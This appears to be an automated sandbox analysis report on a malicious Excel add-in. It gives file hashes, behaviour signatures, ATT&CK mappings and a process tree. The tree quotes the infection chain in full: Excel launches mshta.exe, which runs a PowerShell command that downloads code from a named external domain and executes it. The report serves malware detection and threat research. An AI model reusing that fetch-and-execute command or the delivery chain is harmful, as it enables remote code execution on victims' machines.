Analysis

  • max time kernel
    102s
  • max time network
    124s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23-05-2024 01:29

General

  • Target

    0c80a5b85e5c183be0e72555a6cbb01373aa6786f5cd9c6b1b33ed0b2c0626a6.xll

  • Size

    12KB

  • MD5

    9c29fa879f4bb516bf284091f214578f

  • SHA1

    7fb01e0e2f8f4fd269e68defccbaad8edfb7f53f

  • SHA256

    0c80a5b85e5c183be0e72555a6cbb01373aa6786f5cd9c6b1b33ed0b2c0626a6

  • SHA512

    d3a813ce0089dd307825e3c7de54766772cb3b7cb600b1feba880cf0bc11306fcc429a28836e00ffe641921a7ac4bfe87c5c7d6a6cc43d1a2c29e5b72557e88b

  • SSDEEP

    192:hL29RBzDzeobchBj8JONRONatruGrEPEjr7Ahe:x29jnbcvYJOuwuGvr7Ce

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\0c80a5b85e5c183be0e72555a6cbb01373aa6786f5cd9c6b1b33ed0b2c0626a6.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4156
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2720
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2308

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\RV9E03Y0\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\0c80a5b85e5c183be0e72555a6cbb01373aa6786f5cd9c6b1b33ed0b2c0626a6.xll
    Filesize

    12KB

    MD5

    9c29fa879f4bb516bf284091f214578f

    SHA1

    7fb01e0e2f8f4fd269e68defccbaad8edfb7f53f

    SHA256

    0c80a5b85e5c183be0e72555a6cbb01373aa6786f5cd9c6b1b33ed0b2c0626a6

    SHA512

    d3a813ce0089dd307825e3c7de54766772cb3b7cb600b1feba880cf0bc11306fcc429a28836e00ffe641921a7ac4bfe87c5c7d6a6cc43d1a2c29e5b72557e88b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_achutpq1.duj.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2308-61-0x0000000006430000-0x000000000647C000-memory.dmp
    Filesize

    304KB

  • memory/2308-60-0x0000000006380000-0x000000000639E000-memory.dmp
    Filesize

    120KB

  • memory/2308-59-0x0000000005EB0000-0x0000000006207000-memory.dmp
    Filesize

    3.3MB

  • memory/2308-62-0x00000000079D0000-0x000000000804A000-memory.dmp
    Filesize

    6.5MB

  • memory/2308-50-0x0000000005E40000-0x0000000005EA6000-memory.dmp
    Filesize

    408KB

  • memory/2308-49-0x0000000005DD0000-0x0000000005E36000-memory.dmp
    Filesize

    408KB

  • memory/2308-48-0x00000000054F0000-0x0000000005512000-memory.dmp
    Filesize

    136KB

  • memory/2308-47-0x0000000005630000-0x0000000005C5A000-memory.dmp
    Filesize

    6.2MB

  • memory/2308-46-0x0000000002F30000-0x0000000002F66000-memory.dmp
    Filesize

    216KB

  • memory/2308-63-0x00000000068A0000-0x00000000068BA000-memory.dmp
    Filesize

    104KB

  • memory/4156-10-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-7-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-16-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-22-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-21-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-20-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-19-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-18-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-15-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-14-0x00007FFC41670000-0x00007FFC41680000-memory.dmp
    Filesize

    64KB

  • memory/4156-12-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-13-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-11-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-0-0x00007FFC44210000-0x00007FFC44220000-memory.dmp
    Filesize

    64KB

  • memory/4156-9-0x00007FFC41670000-0x00007FFC41680000-memory.dmp
    Filesize

    64KB

  • memory/4156-17-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-8-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-6-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-4-0x00007FFC44210000-0x00007FFC44220000-memory.dmp
    Filesize

    64KB

  • memory/4156-5-0x00007FFC44210000-0x00007FFC44220000-memory.dmp
    Filesize

    64KB

  • memory/4156-1-0x00007FFC84223000-0x00007FFC84224000-memory.dmp
    Filesize

    4KB

  • memory/4156-2-0x00007FFC44210000-0x00007FFC44220000-memory.dmp
    Filesize

    64KB

  • memory/4156-3-0x00007FFC44210000-0x00007FFC44220000-memory.dmp
    Filesize

    64KB

  • memory/4156-70-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB

  • memory/4156-71-0x00007FFC84223000-0x00007FFC84224000-memory.dmp
    Filesize

    4KB

  • memory/4156-87-0x00007FFC44210000-0x00007FFC44220000-memory.dmp
    Filesize

    64KB

  • memory/4156-90-0x00007FFC44210000-0x00007FFC44220000-memory.dmp
    Filesize

    64KB

  • memory/4156-89-0x00007FFC44210000-0x00007FFC44220000-memory.dmp
    Filesize

    64KB

  • memory/4156-88-0x00007FFC44210000-0x00007FFC44220000-memory.dmp
    Filesize

    64KB

  • memory/4156-91-0x00007FFC84180000-0x00007FFC84389000-memory.dmp
    Filesize

    2.0MB